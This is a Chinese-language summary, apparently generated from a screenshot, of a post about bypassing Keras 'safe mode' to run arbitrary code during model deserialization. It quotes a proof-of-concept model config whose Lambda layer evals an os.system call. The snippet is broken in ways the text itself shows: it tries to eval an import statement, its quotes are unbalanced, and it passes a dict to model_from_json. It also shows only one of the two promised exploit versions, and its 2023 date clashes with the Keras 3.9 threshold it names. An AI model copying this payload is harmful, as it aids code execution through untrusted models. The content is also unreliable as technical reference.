从这个网页截图中可以获取到以下关于漏洞的关键信息: - **标题**:TensorFlow Keras "Safe Mode" 是否真的安全?绕过安全模式以实现任意代码执行 - **作者**:Ryan Smith,发布于2023年9月18日 - **主要内容**: - 描述了Keras的反序列化机制中的一个漏洞,该漏洞允许攻击者绕过“安全模式”并执行任意代码。 - 提供了漏洞利用的示例代码,展示了如何在Keras版本3.9之前和之后进行漏洞利用。 - 强调了Keras反序列化机制的安全性问题,并建议开发者注意相关风险。 - **关键代码片段**: ```python # Exploitation before Keras version 3.9 import keras from keras.models import model_from_json malicious_model = { 'class_name': 'ExploitModel', 'config': { 'name': 'exploit_model', 'layers': [ { 'class_name': 'InputLayer', 'config': { 'batch_input_shape': [None, 1], 'dtype': 'float32', 'name': 'input_1' } }, { 'class_name': 'Lambda', 'config': { 'function': 'lambda x: eval("import os; os.system('echo PWNED')")', 'output_shape': [1] } } ] } } model = model_from_json(malicious_model) ``` - **总结**: - 漏洞存在于Keras的反序列化过程中,攻击者可以通过构造恶意模型配置来执行任意代码。 - 建议开发者在处理不可信的模型配置时采取额外的安全措施,以防止此类攻击。